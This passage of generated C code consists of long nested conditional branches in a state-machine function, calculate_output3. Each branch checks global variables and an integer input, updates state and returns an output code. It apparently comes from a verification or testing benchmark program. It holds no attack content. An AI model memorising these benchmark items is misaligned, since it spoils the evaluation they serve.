a14 = 18;
a26 = 17;
return -1;
} else if(((!(a3==1)&&((a1==1)&&((a4==16)&&((((((a7==1)&&(a26==18))&&(a14==20))||(((!(a7==1)&&(a26==19))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20))))&&(input==1))&&(a28==17)))))&&(a25==1))){
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
a3 = 1;
return -1;
} else if(((((a25==1)&&((((a14==20)&&((a7==1)&&((input==5)&&(((a26==17)||(a26==18))||(a26==19)))))&&(a1==1))&&(a28==15)))&&!(a3==1))&&(a4==17))){
a3 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if((((a4==17)&&((a1==1)&&(((input==2)&&((((!(a7==1)&&((a28==15)&&(a26==18)))&&(a14==20))||((a14==20)&&(!(a7==1)&&((a26==19)&&(a28==15)))))||((((a26==17)&&(a28==16))&&(a7==1))&&(a14==18))))&&(a25==1))))&&(a3==1))){
a4 = 18;
a14 = 18;
a28 = 15;
a26 = 19;
a7 = 1;
return 24;
} else if((((((((!(a7==1)&&((a28==17)&&(((a4==18)&&(a3==1))&&(a26==19))))&&(a14==20))||((a14==18)&&((a7==1)&&((a28==15)&&((a26==17)&&(!(a3==1)&&(a4==16)))))))||((((a28==15)&&(((a4==16)&&!(a3==1))&&(a26==18)))&&(a7==1))&&(a14==18)))&&(input==4))&&(a1==1))&&(a25==1))){
a14 = 18;
a4 = 16;
a26 = 17;
a3 = 1;
a7 = 1;
a28 = 15;
return -1;
} else if((((((a3==1)&&((((((a26==17)||(a26==18))&&(input==4))&&(a28==17))&&(a25==1))&&(a1==1)))&&(a4==17))&&(a14==18))&&(a7==1))){
a4 = 18;
a28 = 16;
a7 = 0;
a26 = 18;
return 22;
} else if((((a28==15)&&((a25==1)&&((((input==5)&&(((a14==18)&&((a26==19)&&!(a7==1)))||((a14==19)&&((a26==17)&&(a7==1)))))&&!(a3==1))&&(a1==1))))&&(a4==18))){
a3 = 1;
a14 = 18;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} return calculate_output3(input);
}
int calculate_output3(int input) {
if((!(a3==1)&&((((a14==18)&&((a7==1)&&(((a4==17)&&(((a26==17)||(a26==18))&&(input==1)))&&(a28==17))))&&(a1==1))&&(a25==1)))){
a28 = 15;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if(((a7==1)&&((a1==1)&&(((a14==20)&&((((a28==17)&&(((a26==19)||((a26==17)||(a26==18)))&&(input==1)))&&!(a3==1))&&(a25==1)))&&(a4==17))))){
a7 = 0;
a26 = 17;
a28 = 15;
a4 = 18;
a14 = 18;
return 21;
} else if((((((((a14==20)&&((a4==18)&&((a25==1)&&(input==3))))&&(a3==1))&&(a7==1))&&(a1==1))&&(a28==15))&&(a26==19))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if(((((a25==1)&&((a14==20)&&(((a1==1)&&((input==2)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1))))))&&(a3==1))))&&(a4==18))&&(a28==17))){
a4 = 16;
a7 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
return -1;
} else if(((((((((a28==15)&&((input==6)&&((a26==17)||(a26==18))))&&!(a3==1))&&(a4==18))&&(a25==1))&&(a1==1))&&(a7==1))&&(a14==18))){
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if((((a25==1)&&(!(a3==1)&&((a4==16)&&(((input==1)&&(((a14==18)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==19))))&&(a1==1)))))&&(a28==17))){
a4 = 17;
a14 = 19;
a7 = 0;
a28 = 15;
a26 = 19;
return 21;
} else if((!(a7==1)&&(((a14==18)&&((a3==1)&&((((a25==1)&&((input==2)&&(a1==1)))&&(a4==18))&&(a26==18))))&&(a28==17)))){
a26 = 17;
a4 = 16;
a28 = 15;
a7 = 1;
return -1;
} else if(((((a4==17)&&((a14==20)&&((a1==1)&&((((((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==1))&&(a28==16)))))&&!(a3==1))&&(a25==1))){
a26 = 19;
a7 = 1;
return -1;
} else if(((((a7==1)&&((((((input==1)&&!(a3==1))&&(a4==16))&&(a28==16))&&(a14==18))&&(a1==1)))&&(a26==18))&&(a25==1))){
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if((!(a7==1)&&(((a1==1)&&(((a3==1)&&(((a25==1)&&(((a26==18)||(a26==19))&&(input==3)))&&(a14==19)))&&(a28==16)))&&(a4==18)))){
a26 = 17;
a4 = 16;
a7 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if((((a3==1)&&((((input==6)&&(((a14==18)&&(((a28==16)&&(a26==17))&&(a7==1)))||(((a14==20)&&(!(a7==1)&&((a26==18)&&(a28==15))))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20)))))&&(a4==18))&&(a25==1)))&&(a1==1))){
a26 = 17;
a14 = 18;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if(((a4==18)&&(((a28==15)&&((a25==1)&&(((((a14==19)&&(input==5))&&(a7==1))&&(a3==1))&&(a26==19))))&&(a1==1)))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((a1==1)&&((a4==17)&&((((((((a26==17)&&(a7==1))&&(a14==19))||(((a14==18)&&((a26==18)&&!(a7==1)))||((a14==18)&&(!(a7==1)&&(a26==19)))))&&(input==5))&&(a25==1))&&(a3==1))&&(a28==16))))){
a4 = 16;
a14 = 18;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((!(a7==1)&&(!(a3==1)&&(((a14==18)&&(((a4==16)&&((a25==1)&&(input==4)))&&(a28==17)))&&(a26==17))))&&(a1==1))){
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((((a14==20)&&(((((a4==17)&&((input==3)&&(a26==17)))&&(a3==1))&&(a25==1))&&(a1==1)))&&!(a7==1))&&(a28==15))){
a7 = 1;
a14 = 18;
a4 = 16;
return -1;
} else if((((((a1==1)&&(!(a3==1)&&((input==3)&&(((a14==19)&&((a7==1)&&(a26==18)))||(((!(a7==1)&&(a26==19))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))))))&&(a28==17))&&(a25==1))&&(a4==18))){
a4 = 17;
a28 = 15;
a7 = 0;
a26 = 18;
a14 = 18;
return 24;
} else if(((a4==17)&&(((((input==6)&&((((((a28==15)&&(a26==18))&&!(a7==1))&&(a14==20))||((((a26==19)&&(a28==15))&&!(a7==1))&&(a14==20)))||(((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18))))&&(a25==1))&&(a3==1))&&(a1==1)))){
a4 = 16;
a28 = 15;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} else if(((a14==19)&&(((a1==1)&&(((!(a3==1)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==5)))&&(a25==1))&&(a28==16)))&&(a4==18)))){
a4 = 16;
a3 = 1;
a7 = 0;
a26 = 18;
a28 = 15;
return -1;
} else if(((((a3==1)&&((((((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==5))&&(a25==1))&&(a4==17))&&(a1==1)))&&(a28==16))&&(a14==18))){
a26 = 18;
a28 = 15;
a4 = 18;
a7 = 1;
a14 = 19;
return 22;
} else if(((((a14==18)&&(((((a3==1)&&((input==5)&&((a26==19)||((a26==17)||(a26==18)))))&&(a4==18))&&(a28==15))&&(a25==1)))&&!(a7==1))&&(a1==1))){
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a14==20)&&((((a4==17)&&(((a28==17)&&(((a1==1)&&(input==2))&&(a26==18)))&&(a3==1)))&&(a25==1))&&(a7==1)))){
a4 = 16;
a14 = 18;
a28 = 15;
a26 = 17;
return -1;
} else if(((((((a28==15)&&((((a14==20)&&((a7==1)&&(a26==18)))||(((a14==19)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==20))))&&(input==4)))&&(a1==1))&&(a4==18))&&(a25==1))&&(a3==1))){
a26 = 17;
a7 = 1;
a14 = 18;
a4 = 16;
return -1;
} else if(((((a28==16)&&((a3==1)&&((a1==1)&&((a4==18)&&(((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==4))))))&&(a14==18))&&(a25==1))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((a1==1)&&((a28==16)&&(((a25==1)&&(!(a3==1)&&((a14==18)&&(((input==2)&&((a26==17)||(a26==18)))&&(a7==1)))))&&(a4==18))))){
a4 = 16;
a26 = 17;
a28 = 15;
a3 = 1;
return -1;
} else if(((a4==18)&&((a1==1)&&(((a25==1)&&((input==2)&&((((a7==1)&&((a28==17)&&(a26==17)))&&(a14==18))||(((a14==20)&&(((a28==16)&&(a26==18))&&!(a7==1)))||((((a28==16)&&(a26==19))&&!(a7==1))&&(a14==20))))))&&(a3==1))))){
a4 = 16;
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((a28==17)&&((((a25==1)&&((a14==19)&&((((input==2)&&!(a3==1))&&!(a7==1))&&(a26==17))))&&(a1==1))&&(a4==16)))){
a14 = 18;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if(((a3==1)&&(((((a1==1)&&((((a25==1)&&(input==2))&&(a4==18))&&(a14==20)))&&(a7==1))&&(a28==16))&&(a26==17)))){
return -1;
} else if((((a4==18)&&(((a28==15)&&(!(a3==1)&&((input==6)&&(((a14==18)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==19))))))&&(a25==1)))&&(a1==1))){
a14 = 18;
a3 = 1;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if(((a1==1)&&((a25==1)&&(((a4==18)&&((((input==5)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))&&!(a3==1))&&(a14==19)))&&(a28==15))))){
a3 = 1;
a4 = 16;
a26 = 17;
a7 = 1;
a14 = 18;
return -1;
} else if((((a4==18)&&(((!(a3==1)&&(((a1==1)&&((input==3)&&((a26==17)||(a26==18))))&&(a25==1)))&&(a7==1))&&(a28==17)))&&(a14==18))){
a28 = 15;
a4 = 17;
a3 = 1;
a26 = 19;
a7 = 0;
return -1;
} else if((!(a3==1)&&((((a28==15)&&((a1==1)&&((((a26==19)&&(input==1))&&(a7==1))&&(a25==1))))&&(a14==18))&&(a4==16)))){
a26 = 17;
a3 = 1;
return -1;
} else if(((a25==1)&&((((((a28==16)&&(((input==5)&&(a26==18))&&(a14==19)))&&(a1==1))&&(a7==1))&&(a4==18))&&!(a3==1)))){
a14 = 18;
a26 = 17;
a28 = 15;
a3 = 1;
a4 = 16;
return -1;
} else if((!(a3==1)&&((a25==1)&&((a1==1)&&((input==4)&&((((((a28==17)&&((a26==18)&&(a4==16)))&&!(a7==1))&&(a14==20))||((a14==20)&&((((a26==19)&&(a4==16))&&(a28==17))&&!(a7==1))))||((((a28==15)&&((a26==17)&&(a4==17)))&&(a7==1))&&(a14==18)))))))){
a28 = 15;
a14 = 18;
a26 = 17;
a7 = 1;
a4 = 16;
a3 = 1;
return -1;
} else if(((a14==19)&&(((a1==1)&&((((a25==1)&&((input==2)&&((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))))&&(a4==17))&&(a3==1)))&&(a28==17)))){
a28 = 15;
a26 = 17;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if(((a4==17)&&((a1==1)&&(((((((a14==20)&&(((a28==15)&&(a26==18))&&!(a7==1)))||((a14==20)&&(((a26==19)&&(a28==15))&&!(a7==1))))||(((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18)))&&(input==1))&&(a25==1))&&(a3==1))))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
return -1;
} else if((((a1==1)&&(!(a3==1)&&(((a14==20)&&(((input==6)&&(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(a25==1)))&&(a28==16))))&&(a4==16))){
a28 = 15;
a7 = 1;
a26 = 17;
a14 = 18;
a3 = 1;
return -1;
} else if(((((((a25==1)&&(((a28==15)&&((input==6)&&(a14==20)))&&(a4==18)))&&!(a7==1))&&(a1==1))&&!(a3==1))&&(a26==17))){
a7 = 1;
a14 = 18;
a4 = 16;
a3 = 1;
return -1;
} else if((((((((a4==16)&&(!(a3==1)&&((input==4)&&((a26==17)||(a26==18)))))&&(a25==1))&&(a14==19))&&(a1==1))&&(a28==15))&&(a7==1))){
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((a25==1)&&((!(a7==1)&&((((a4==17)&&((a14==18)&&(((a26==18)||(a26==19))&&(input==4))))&&(a28==16))&&(a1==1)))&&!(a3==1)))){
a26 = 19;
a28 = 17;
a7 = 1;
return 26;
} else if((((((a1==1)&&((input==1)&&(((a14==18)&&(((a26==17)&&(a28==16))&&(a7==1)))||(((((a26==18)&&(a28==15))&&!(a7==1))&&(a14==20))||((((a26==19)&&(a28==15))&&!(a7==1))&&(a14==20))))))&&(a25==1))&&!(a3==1))&&(a4==17))){
a26 = 17;
a28 = 16;
a14 = 19;
a7 = 0;
return 22;
} else if(((a4==17)&&((a3==1)&&((a14==18)&&((a25==1)&&((((a28==17)&&((input==3)&&((a26==17)||(a26==18))))&&(a7==1))&&(a1==1))))))){
a4 = 16;
a26 = 17;
a28 = 15;
return -1;
} else if((((a14==18)&&(!(a3==1)&&((a1==1)&&(((a4==17)&&((input==6)&&((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))))&&(a28==16)))))&&(a25==1))){
a28 = 17;
a7 = 1;
a26 = 18;
return 24;
} else if((((a25==1)&&((((((((a26==17)||(a26==18))&&(input==6))&&(a3==1))&&(a1==1))&&(a4==17))&&(a28==17))&&(a7==1)))&&(a14==18))){
a28 = 15;
a26 = 17;
a4 = 16;
return -1;
} else if(((a1==1)&&((a4==16)&&(!(a3==1)&&(((((((a26==19)&&(a28==15))&&!(a7==1))&&(a14==20))||((a14==18)&&(((a26==17)&&(a28==16))&&(a7==1))))&&(input==3))&&(a25==1)))))){
a14 = 18;
a26 = 17;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((((a26==19)&&((((((a14==19)&&(input==2))&&(a7==1))&&(a1==1))&&(a28==15))&&(a25==1)))&&(a4==16))&&!(a3==1))){
a28 = 17;
a14 = 18;
return 24;
} else if(((((a1==1)&&((a14==19)&&((a28==15)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==3))&&(a4==17)))))&&(a25==1))&&!(a3==1))){
a7 = 1;
a3 = 1;
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a25==1)&&((((((((a26==19)&&!(a7==1))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))||((a14==19)&&((a26==18)&&(a7==1))))&&(input==5))&&!(a3==1))&&(a1==1)))&&(a28==15))&&(a4==17))){
a7 = 1;
a3 = 1;
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if(((a4==18)&&((a14==20)&&(((((a1==1)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==1)))&&(a25==1))&&(a28==16))&&!(a3==1))))){
a26 = 19;
a3 = 1;
a7 = 0;
a28 = 15;
a4 = 16;
a14 = 18;
return -1;
} else if(((a28==17)&&((a25==1)&&((a1==1)&&((a7==1)&&((!(a3==1)&&((a26==18)&&((input==3)&&(a14==18))))&&(a4==16))))))){
a3 = 1;
a28 = 16;
a26 = 19;
a4 = 18;
return -1;
} else if((((a4==17)&&((a25==1)&&(((a28==16)&&((((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==5))&&(a3==1)))&&(a1==1))))&&(a14==19))){
a4 = 16;
a14 = 18;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if((((a28==17)&&((a4==18)&&(!(a3==1)&&((a7==1)&&((((input==1)&&((a26==17)||(a26==18)))&&(a1==1))&&(a25==1))))))&&(a14==18))){
a26 = 17;
a7 = 0;
return 21;
} else if((((a14==19)&&(((a25==1)&&(((((((a26==17)||(a26==18))||(a26==19))&&(input==1))&&(a4==17))&&!(a3==1))&&(a28==16)))&&(a7==1)))&&(a1==1))){
a26 = 17;
a4 = 16;
a3 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if((((a25==1)&&((((a3==1)&&((a1==1)&&((input==4)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))))))&&(a28==17))&&(a4==18)))&&(a14==20))){
a26 = 17;
a28 = 15;
a7 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if(((a3==1)&&((a4==17)&&(((a1==1)&&((a26==17)&&(((a25==1)&&((a28==15)&&(input==1)))&&!(a7==1))))&&(a14==20))))){
a28 = 17;
a14 = 19;
a26 = 19;
return 24;
} else if(((a4==17)&&(((a1==1)&&((a14==20)&&((!(a7==1)&&(((a28==15)&&(input==6))&&!(a3==1)))&&(a26==17))))&&(a25==1)))){
a26 = 18;
a7 = 1;
a28 = 17;
a4 = 16;
a14 = 19;
return -1;
} else if(((a25==1)&&(((a28==15)&&((((a14==18)&&(!(a7==1)&&((input==4)&&((a26==19)||((a26==17)||(a26==18))))))&&!(a3==1))&&(a1==1)))&&(a4==16)))){
a14 = 20;
a28 = 16;
a26 = 17;
return 24;
} else if(((((a14==20)&&((((a1==1)&&((a26==17)&&((input==4)&&!(a7==1))))&&(a4==17))&&!(a3==1)))&&(a25==1))&&(a28==15))){
a4 = 16;
a7 = 1;
a14 = 18;
a3 = 1;
return -1;
} else if((((((a3==1)&&((input==5)&&(((a14==18)&&(((a28==17)&&(a26==17))&&(a7==1)))||(((((a28==16)&&(a26==18))&&!(a7==1))&&(a14==20))||((((a26==19)&&(a28==16))&&!(a7==1))&&(a14==20))))))&&(a25==1))&&(a4==18))&&(a1==1))){
a26 = 17;
a7 = 1;
a4 = 16;
a14 = 18;
a28 = 15;
return -1;
} else if((((a14==19)&&(((a28==15)&&((a25==1)&&((a3==1)&&(((!(a7==1)&&(a26==18))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==6)))))&&(a1==1)))&&(a4==17))){
a4 = 16;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} else if((((a14==18)&&((a25==1)&&((((a4==18)&&((a3==1)&&(((a26==18)||(a26==19))&&(input==1))))&&(a7==1))&&(a1==1))))&&(a28==15))){
a26 = 17;
a4 = 16;
return -1;
} else if(((((((a1==1)&&((((input==6)&&(a25==1))&&(a26==17))&&!(a3==1)))&&!(a7==1))&&(a4==16))&&(a28==17))&&(a14==19))){
a14 = 18;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if(((((a14==18)&&((a4==18)&&((((((a26==18)&&!(a7==1))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==2))&&!(a3==1))&&(a25==1))))&&(a28==17))&&(a1==1))){
a28 = 15;
a26 = 17;
a7 = 0;
a4 = 17;
return 23;
} else if(((((((!(a3==1)&&((((a26==17)||(a26==18))&&(input==3))&&(a1==1)))&&(a14==19))&&(a7==1))&&(a25==1))&&(a4==16))&&(a28==15))){
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((a25==1)&&((((input==2)&&((((!(a7==1)&&((a28==17)&&((a26==18)&&(a4==16))))&&(a14==20))||((a14==20)&&(!(a7==1)&&((a28==17)&&((a26==19)&&(a4==16))))))||(((a7==1)&&(((a4==17)&&(a26==17))&&(a28==15)))&&(a14==18))))&&!(a3==1))&&(a1==1)))){
a28 = 15;
a14 = 18;
a26 = 17;
a4 = 16;
a3 = 1;
a7 = 1;
return -1;
} else if((((a25==1)&&((((((input==6)&&((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1))))&&(a14==20))&&(a3==1))&&(a4==18))&&(a1==1)))&&(a28==16))){
a28 = 15;
a3 = 0;
a7 = 0;
a4 = 16;
a26 = 18;
return 23;
} else if(((a28==16)&&(((!(a3==1)&&((((a25==1)&&(((a26==18)||(a26==19))&&(input==1)))&&(a4==17))&&!(a7==1)))&&(a1==1))&&(a14==18)))){
a3 = 1;
a26 = 17;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if((((a25==1)&&(!(a7==1)&&(((a14==18)&&((((((a26==17)||(a26==18))||(a26==19))&&(input==1))&&!(a3==1))&&(a4==16)))&&(a1==1))))&&(a28==15))){
a26 = 17;
a7 = 1;
a3 = 1;
return -1;
} else if(((((((a1==1)&&((a25==1)&&((input==3)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))))&&(a4==17))&&(a28==17))&&(a14==18))&&(a3==1))){
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if((((a1==1)&&((!(a3==1)&&((a28==15)&&((a4==18)&&((input==6)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))))))&&(a14==18)))&&(a25==1))){
a26 = 17;
a7 = 1;
a3 = 1;
a4 = 16;
return -1;
} else if(((((a7==1)&&((((!(a3==1)&&((a26==17)&&(input==4)))&&(a14==20))&&(a25==1))&&(a28==16)))&&(a4==17))&&(a1==1))){
a3 = 1;
a28 = 15;
a14 = 18;
a4 = 16;
return -1;
} else if((((a28==17)&&(((a4==17)&&((a3==1)&&((input==6)&&((((a7==1)&&(a26==17))&&(a14==20))||(((a14==19)&&(!(a7==1)&&(a26==18)))||((!(a7==1)&&(a26==19))&&(a14==19)))))))&&(a25==1)))&&(a1==1))){
a14 = 20;
a4 = 18;
a26 = 17;
a7 = 1;
a28 = 16;
return 26;
} else if(((a4==17)&&(((((a28==15)&&(!(a7==1)&&(!(a3==1)&&((a1==1)&&(input==3)))))&&(a25==1))&&(a26==18))&&(a14==19)))){
a26 = 17;
a14 = 18;
a4 = 16;
a7 = 1;
a3 = 1;
return -1;
} else if(((a28==17)&&((a25==1)&&((a3==1)&&(((a4==17)&&(((((a14==19)&&(!(a7==1)&&(a26==18)))||(((a26==19)&&!(a7==1))&&(a14==19)))||((a14==20)&&((a7==1)&&(a26==17))))&&(input==5)))&&(a1==1)))))){
a28 = 15;
a14 = 18;
a4 = 16;
a26 = 17;
a7 = 1;
return -1;
} else if(((a4==18)&&(((((((a3==1)&&((a14==19)&&(input==5)))&&(a7==1))&&(a1==1))&&(a26==17))&&(a28==16))&&(a25==1)))){
a4 = 16;
a14 = 18;
a28 = 15;
return -1;
} else if(((a25==1)&&(((a1==1)&&((a4==17)&&(((a7==1)&&(((input==5)&&((a26==17)||(a26==18)))&&(a14==18)))&&(a3==1))))&&(a28==17)))){
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if((((((a25==1)&&(((a4==17)&&(((a26==19)&&(input==6))&&(a14==19)))&&!(a7==1)))&&!(a3==1))&&(a28==17))&&(a1==1))){
a4 = 16;
a14 = 18;
a7 = 1;
a3 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((a28==15)&&(((((a25==1)&&(!(a7==1)&&((input==3)&&((a26==19)||((a26==17)||(a26==18))))))&&(a14==18))&&(a1==1))&&(a3==1)))&&(a4==18))){
a4 = 16;
a26 = 17;
a7 = 1;
return -1;
} else if(((a26==18)&&(((a14==20)&&((((a3==1)&&((a1==1)&&((a4==18)&&(input==5))))&&!(a7==1))&&(a28==17)))&&(a25==1)))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
return -1;
} else if((((a1==1)&&((a4==18)&&((a25==1)&&((a7==1)&&((a14==20)&&(((input==2)&&(((a26==17)||(a26==18))||(a26==19)))&&!(a3==1)))))))&&(a28==15))){
a4 = 16;
a14 = 18;
a3 = 1;
a26 = 17;
return -1;
} else if((((a14==18)&&(((a28==15)&&((a3==1)&&((a4==18)&&(((((a26==17)||(a26==18))||(a26==19))&&(input==1))&&(a1==1)))))&&(a25==1)))&&!(a7==1))){
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a28==16)&&((a1==1)&&(((input==2)&&(((a14==18)&&((a26==19)&&!(a7==1)))||(((a7==1)&&(a26==17))&&(a14==19))))&&!(a3==1))))&&(a25==1))&&(a4==18))){
a14 = 19;
a26 = 18;
a7 = 0;
return 24;
} else if((((a25==1)&&(!(a3==1)&&(((((((a14==19)&&((a26==19)&&!(a7==1)))||((a14==20)&&((a7==1)&&(a26==17))))||((a14==20)&&((a7==1)&&(a26==18))))&&(input==3))&&(a4==18))&&(a28==16))))&&(a1==1))){
a7 = 1;
a26 = 18;
a14 = 20;
return -1;
} else if(((a4==18)&&((((a25==1)&&((a28==16)&&(((input==2)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&!(a3==1))))&&(a1==1))&&(a14==20)))){
a28 = 17;
a7 = 0;
a3 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if((((((a3==1)&&((a28==16)&&((a1==1)&&(!(a7==1)&&(((a26==18)||(a26==19))&&(input==1))))))&&(a4==17))&&(a25==1))&&(a14==20))){
a26 = 18;
a14 = 18;
a4 = 18;
a7 = 1;
return 21;
} else if(((((((((a25==1)&&((input==6)&&((a26==17)||(a26==18))))&&(a28==16))&&(a4==16))&&(a7==1))&&(a1==1))&&!(a3==1))&&(a14==19))){
a3 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
return -1;
} else if((((a28==16)&&(!(a3==1)&&((a25==1)&&(((input==4)&&(((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20)))||(((a7==1)&&(a26==18))&&(a14==20))))&&(a1==1)))))&&(a4==16))){
a14 = 18;
a28 = 15;
a3 = 1;
a26 = 17;
a7 = 1;
return -1;
} else if((((a7==1)&&((((a25==1)&&((a14==20)&&((a1==1)&&((((a26==17)||(a26==18))||(a26==19))&&(input==4)))))&&(a28==15))&&(a4==18)))&&!(a3==1))){
a4 = 16;
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((!(a3==1)&&(((((a4==18)&&((input==3)&&((((a26==19)&&!(a7==1))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1))))))&&(a1==1))&&(a25==1))&&(a28==16)))){
a3 = 1;
a14 = 18;
a26 = 17;
a28 = 15;
a7 = 1;
a4 = 16;
return -1;
} else if((((a28==15)&&(((a3==1)&&((((a14==18)&&((input==6)&&((a26==19)||((a26==17)||(a26==18)))))&&!(a7==1))&&(a4==18)))&&(a1==1)))&&(a25==1))){
a7 = 1;
a26 = 19;
a28 = 17;
a14 = 19;
return 26;
} else if((((a25==1)&&(((((((a26==18)&&(input==1))&&(a4==18))&&(a14==20))&&(a1==1))&&(a3==1))&&(a28==17)))&&!(a7==1))){
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
a4 = 16;
return -1;
} else if(((a4==18)&&((((((a7==1)&&(!(a3==1)&&((input==3)&&(a14==19))))&&(a25==1))&&(a28==16))&&(a1==1))&&(a26==18)))){
a14 = 20;
return 21;
} else if(((!(a7==1)&&(((a14==18)&&((a28==15)&&((((input==5)&&(a26==18))&&(a25==1))&&!(a3==1))))&&(a4==18)))&&(a1==1))){
a7 = 1;
a14 = 19;
a26 = 19;
return 24;
} else if(((a26==19)&&((a28==15)&&(((a4==16)&&((a1==1)&&((a25==1)&&(((input==6)&&(a14==18))&&!(a3==1)))))&&(a7==1))))){
a26 = 17;
a3 = 1;
return -1;
} else if((((a4==16)&&((!(a3==1)&&(((((input==3)&&(a26==17))&&(a14==19))&&(a25==1))&&(a28==17)))&&(a1==1)))&&!(a7==1))){
a14 = 18;
a28 = 15;
a3 = 1;
a7 = 1;
return -1;
} else if(((a4==17)&&((a1==1)&&(((a14==19)&&((((a28==16)&&((((a26==17)||(a26==18))||(a26==19))&&(input==3)))&&(a25==1))&&!(a3==1)))&&(a7==1))))){
a4 = 16;
a26 = 17;
a14 = 18;
a3 = 1;
a28 = 15;
return -1;
} else if((((a3==1)&&(((a4==17)&&((a1==1)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a28==17))))&&(a25==1)))&&(a14==18))){
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
return -1;
} else if((((a7==1)&&((a14==19)&&((((a28==15)&&(!(a3==1)&&((input==6)&&((a26==17)||(a26==18)))))&&(a4==16))&&(a1==1))))&&(a25==1))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a28==15)&&((((!(a3==1)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==3)))&&(a25==1))&&(a1==1))&&(a14==18)))&&(a4==18))){
a26 = 17;
a3 = 1;
a4 = 16;
a7 = 1;
return -1;
} else if(((((a28==16)&&(((a1==1)&&(((((a14==19)&&(!(a7==1)&&(a26==19)))||((a14==20)&&((a7==1)&&(a26==17))))||((a14==20)&&((a7==1)&&(a26==18))))&&(input==1)))&&(a4==18)))&&(a25==1))&&!(a3==1))){
a26 = 17;
a14 = 20;
a7 = 1;
return -1;
} else if((!(a7==1)&&(((((!(a3==1)&&((a14==19)&&(((a26==18)||(a26==19))&&(input==2))))&&(a1==1))&&(a28==15))&&(a4==18))&&(a25==1)))){
a26 = 17;
a7 = 1;
a3 = 1;
a4 = 16;
a14 = 18;
return -1;
